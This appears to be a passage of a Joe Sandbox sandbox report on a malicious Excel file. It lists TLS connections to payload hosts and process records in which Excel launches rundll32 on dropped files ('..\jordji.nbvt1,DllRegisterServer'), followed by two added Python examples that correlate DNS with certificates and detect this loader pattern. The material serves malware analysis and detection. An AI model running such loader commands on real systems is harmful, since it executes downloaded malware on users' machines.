Timestamp: May 4, 2021 13:48:15.922522068 CEST
Source IP: 192.185.5.2       Source Port: 443
Dest IP: 192.168.2.4         Dest Port: 49735
Leaf certificate: Subject CN=cpcalendars.anaheimdermatologists.com; Issuer CN=R3, O=Let's Encrypt, C=US; Not Before Wed Mar 17 22:18:32 CET 2021; Not After Tue Jun 15 23:18:32 CEST 2021
Intermediate certificate: Subject CN=R3, O=Let's Encrypt, C=US; Issuer CN=DST Root CA X3, O=Digital Signature Trust Co.; Not Before Wed Oct 07 21:21:40 CEST 2020; Not After Wed Sep 29 21:21:40 CEST 2021
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0
JA3 SSL Client Digest: 37f463bf4616ecd445d4a1937da06e19

In both connections the leaf certificate CN (mail.gdmart.com.bd, cpcalendars.anaheimdermatologists.com) differs from the name the sample resolved (industrialarttextile.com, anaheimdermatologists.com). The report records only the CN, not the Subject Alternative Names, so this is consistent with shared web hosting rather than evidence of a failed validation. Both handshakes carry the same JA3 client digest, i.e. the same client TLS stack made both requests.
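The DNS answers and TLS server certificates above are the two data points an analyst normally joins by hand: which name resolved to which IP, and whether the certificate that IP presented actually names that host. The following is an added example, not part of the Joe Sandbox report; the DNS_ANSWERS and TLS_SERVERS records are transcribed from the two tables above, while the record layout, function names and the RFC 6125 style wildcard rule are this example's own. Because the report exposes only the leaf CN and not the Subject Alternative Names, a "not covered" result here means the CN alone does not cover the resolved name, not that validation would fail.

```python
"""Correlate DNS answers with observed TLS server certificates.

Added example; not part of the Joe Sandbox report. DNS_ANSWERS and
TLS_SERVERS are transcribed from the report's DNS Answers and HTTPS
Packets tables; the record layout and function names are this example's
own, not a Joe Sandbox export format.
"""
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class DnsAnswer:
    name: str      # queried name
    address: str   # A record returned


@dataclass(frozen=True)
class TlsServer:
    ip: str
    port: int
    leaf_cn: str       # CN of the leaf certificate the server presented
    issuer: str
    ja3_digest: str    # JA3 digest of the client hello, from the report


# Transcribed from the report's DNS Answers table.
DNS_ANSWERS: List[DnsAnswer] = [
    DnsAnswer("industrialarttextile.com", "192.254.233.89"),
    DnsAnswer("anaheimdermatologists.com", "192.185.5.2"),
]

# Transcribed from the report's HTTPS Packets table (leaf certificate rows).
TLS_SERVERS: List[TlsServer] = [
    TlsServer("192.254.233.89", 443, "mail.gdmart.com.bd",
              "CN=R3, O=Let's Encrypt, C=US", "37f463bf4616ecd445d4a1937da06e19"),
    TlsServer("192.185.5.2", 443, "cpcalendars.anaheimdermatologists.com",
              "CN=R3, O=Let's Encrypt, C=US", "37f463bf4616ecd445d4a1937da06e19"),
]


def cn_covers(cn: str, hostname: str) -> bool:
    """RFC 6125 style match: exact name, or one leftmost wildcard label.

    A wildcard stands in for exactly one label, so '*.example.com' covers
    'a.example.com' but neither 'example.com' nor 'a.b.example.com'.
    """
    cn = cn.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if cn == hostname:
        return True
    if cn.startswith("*.") and "*" not in cn[2:]:
        parts = hostname.split(".", 1)
        # require a dot in the remainder so '*.com' cannot cover 'a.com'
        return len(parts) == 2 and "." in parts[1] and parts[1] == cn[2:]
    return False


def correlate(answers: List[DnsAnswer], servers: List[TlsServer]) -> List[dict]:
    """For each TLS server, list the names that resolved to it and whether
    the presented leaf CN covers any of them."""
    ip_to_names: Dict[str, List[str]] = {}
    for a in answers:
        ip_to_names.setdefault(a.address, []).append(a.name)
    findings = []
    for s in servers:
        names = ip_to_names.get(s.ip, [])
        covered = [n for n in names if cn_covers(s.leaf_cn, n)]
        findings.append({
            "ip": s.ip,
            "resolved_names": names,
            "leaf_cn": s.leaf_cn,
            "cn_covers_resolved_name": bool(covered),
        })
    return findings


def shared_ja3(servers: List[TlsServer]) -> Dict[str, List[str]]:
    """Group contacted server IPs by the JA3 digest of the client hello;
    a single digest across all contacts means one client TLS stack."""
    groups: Dict[str, List[str]] = {}
    for s in servers:
        groups.setdefault(s.ja3_digest, []).append(s.ip)
    return groups


if __name__ == "__main__":
    for finding in correlate(DNS_ANSWERS, TLS_SERVERS):
        print(finding)
    print(shared_ja3(TLS_SERVERS))
```

Run against the report's own records, neither leaf CN covers the name that was resolved, and both connections group under the same JA3 digest; to turn this into a real check the SAN list would have to be pulled from the captured certificate rather than from the report's CN column.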

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 13:48:07
Start date: 04/05/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0x100000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 13:48:16
Start date: 04/05/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32 ..\jordji.nbvt1,DllRegisterServer
Imagebase: 0xb0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 13:48:16
Start date: 04/05/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32 ..\jordji.nbvt11,DllRegisterServer
Imagebase: 0xb0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
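The two rundll32 records above share the traits that make this loader pattern detectable from process telemetry alone: the module is given by a relative path, its extension is not a DLL extension, and the export called is DllRegisterServer, which is normally reached through regsvr32. The following is an added example, not part of the Joe Sandbox report; the three process records are transcribed from the System Behavior section, while the parent field (Excel as the parent of both rundll32 processes) is this example's assumption, and the reason strings, the OFFICE_IMAGES set and the two-reason threshold are the example's own choices.

```python
"""Flag rundll32 invocations shaped like the two in this report.

Added example; not part of the Joe Sandbox report. PROCESSES is transcribed
from the report's System Behavior section. The 'parent' field is this
example's assumption, and OFFICE_IMAGES, the reason strings and the
min_reasons threshold are the example's own detection choices.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Proc:
    path: str
    cmdline: str
    parent: Optional[str] = None   # assumed parent image path (not in this section)


OFFICE_IMAGES = frozenset({"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"})
DLL_LIKE_EXTENSIONS = frozenset({"dll", "cpl", "ocx", "ax"})
ABSOLUTE_WIN_PATH = re.compile(r"^(?:[A-Za-z]:\\|\\\\)")  # drive letter or UNC prefix

# Transcribed from the report; the parent values are this example's assumption.
PROCESSES: List[Proc] = [
    Proc(r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
         r"'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding"),
    Proc(r"C:\Windows\SysWOW64\rundll32.exe",
         r"rundll32 ..\jordji.nbvt1,DllRegisterServer",
         parent=r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE"),
    Proc(r"C:\Windows\SysWOW64\rundll32.exe",
         r"rundll32 ..\jordji.nbvt11,DllRegisterServer",
         parent=r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE"),
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def parse_rundll32(cmdline: str) -> Optional[Tuple[str, Optional[str]]]:
    """Return (module, export) for 'rundll32[.exe] <module>[,<export>] ...', else None.

    Quoted module paths containing spaces are not handled; the report's
    command lines have none.
    """
    tokens = cmdline.strip().split(None, 2)
    if len(tokens) < 2:
        return None
    image = basename(tokens[0].strip('"\'')).lower()
    if image not in ("rundll32", "rundll32.exe"):
        return None
    module, _, export = tokens[1].partition(",")
    return module, (export or None)


def assess(proc: Proc) -> List[str]:
    """Reasons this process looks like rundll32 loader abuse; empty if none."""
    parsed = parse_rundll32(proc.cmdline)
    if parsed is None:
        return []
    module, export = parsed
    reasons = []
    name = basename(module)
    ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
    if ext not in DLL_LIKE_EXTENSIONS:
        reasons.append(f"module extension '.{ext}' is not a DLL-like extension" if ext
                       else "module has no extension")
    if not ABSOLUTE_WIN_PATH.match(module):
        reasons.append("module given by relative path (resolved against the caller's working directory)")
    if export and export.lower() == "dllregisterserver":
        reasons.append("DllRegisterServer called through rundll32 instead of regsvr32")
    if proc.parent and basename(proc.parent).lower() in OFFICE_IMAGES:
        reasons.append(f"spawned by Office process {basename(proc.parent)}")
    return reasons


def suspicious(procs: List[Proc], min_reasons: int = 2) -> List[Tuple[str, List[str]]]:
    """Return (cmdline, reasons) for every process with at least min_reasons hits."""
    hits = []
    for p in procs:
        reasons = assess(p)
        if len(reasons) >= min_reasons:
            hits.append((p.cmdline, reasons))
    return hits


if __name__ == "__main__":
    for cmdline, reasons in suspicious(PROCESSES):
        print(cmdline)
        for r in reasons:
            print("  -", r)
```

On the report's records the Excel process produces no reasons and each rundll32 process produces all four; a benign `rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL` produces none, which is why the threshold is on the count of independent traits rather than on any single one.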

Disassembly

Code Analysis
